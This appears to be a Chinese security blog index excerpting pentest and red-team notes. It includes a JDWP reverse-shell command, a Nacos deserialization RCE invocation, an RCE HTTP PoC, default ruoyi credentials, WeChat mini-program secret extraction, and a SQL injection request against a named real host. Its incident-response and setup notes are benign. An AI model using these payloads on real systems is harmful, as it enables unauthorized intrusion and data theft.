JDWP命令执行
扫端口探测取巧,直接根据之前的报告探测jdwp服务 利用1python2 jdwp-shellifier.py -t ip -p port --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,base64编码的反弹shell命令}|{base64,-d}|{bash,-i}" 然后服务器上接收到shell
nacos Hessian 反序列化漏洞命令执行
纯记录1java -jar NacosRce.jar url 7884 "" Hessian 反序列化漏洞命令执行成功
初步接触微信小程序
小程序位置新版微信不太一样,直接everything搜Applet 1%appdata%\Tencent\xwechat\radium\Applet\packages 然后运行一个小程序,这里就会有文件夹产生,如果运行一个就产生多个文件夹就找有__APP__.wxapkg的文件夹要反编译的就是__APP__.wxapkg 测试(用fine,反编译拿敏感信息)启动被测小程序,然后就会有文件夹生成直接用fine工具,配置好路径然后他就会自动进行提取敏感信息 信息泄露拿到appid和secret的利用方式接口调试工具直接获取token然后就是到运维中心操作就行
应急响应笔记
定位主机有安全设备直接根据告警的内网ip一键定位 无安全设备那通报给的ip包是公网统一出口ip,就得一台台电脑排查了 排查思路查看外联,定位pid->tasklist定位进程名->找路径->删除->持久化排查 查看外联,定位pid1netstat -ano | findstr ip 红框那一列就是pid tasklist定位进程名1tasklist /FI "PID eq 4992" 找路径任务管理器可以直接打开任务管理器找,在详细信息那里,找到后右键找路径 命令行cmd1wmic process where name="steam.exe" get ExecutablePath powershell1Get-Process steam | Select-Object Pat 持久化排查注册表启动项木马常用注册表自启动位置: 类型 注册表路径 描述 当前用户启动 HKCU\Software\Microsoft\Windows\CurrentVersion\Run 用户登录自动启动 当前用户...
笔记9---java11配置javaFX启动工具
步骤安装javaFX 1sudo apt install openjfx -y 写一个 wrapper 脚本,比如 javafx 1sudo nano /usr/local/bin/javafx 内容 12345#!/bin/bash/usr/lib/jvm/java-11-openjdk-amd64/bin/java \--module-path /usr/share/openjfx/lib \--add-modules javafx.controls,javafx.fxml \"$@" 给权限: 1sudo chmod +x /usr/local/bin/javafx 启动1javafx -jar a.jar
某市hw记录
getshell(或许)禾匠点企来客服系统api/testOrderSubmit rce (CNVD-2022-51194)ehole扫出指纹了然后找到poc验证了下 12345678POST /web/index.php?r=api/testOrderSubmit/index/submit&_mall_id=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipContent-Length:...
笔记4---修改了主题模板,增加了updated判断
updated判断在hexo目录下创建脚本文件scripts/custom-index-generator.js使用就是在文章头部加个updated字段就行 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556// scripts/custom-index-generator.js const pagination = require('hexo-pagination'); hexo.extend.generator.register('index', function(locals) { const config = this.config; const perPage = config.per_page || 10; const paginationDir = config.pagination_dir || 'page'; ...
ruoyi-vue的一次渗透
到手一个ruoyi-vue 弱口令admin:admin123ruoyi:123456
黑产day,也没验证成功,纯当记录
123456789101112131415GET /api/v1/transaction/list?createDateFrom=2025-06-07&createDateTo=2025-06-07&operatorTxId=9%27%2F%2A%2A%2Fand%28select%271%27from%2F%2A%2A%2Fpg_sleep%280%29%29%3A%3Atext%3E%270&page=0&size=25 HTTP/1.1Host: ca-api.staging.spribe.ioUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Authorization: Bearer...
真的不知道怎么被挂马的啊
指纹主站:PHP/5.2.17p1、ThinkPHP 3.1.38080端口有个wdcp 扫目录wdcp扫出点东西 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566[14:59:33] Starting: [14:59:37] 301 - 239B - /js -> /js/[14:59:48] 403 - 213B - /.ht_wsr.txt[14:59:48] 403 - 216B - /.htaccess.bak1[14:59:48] 403 - 216B - /.htaccess.save[14:59:48] 403 - 214B - /.htaccess_sc[14:59:48] 403 - 217B - /.htaccess_extra[14:59:48] 403 - 216B - /.htaccess.orig[14:59:48]...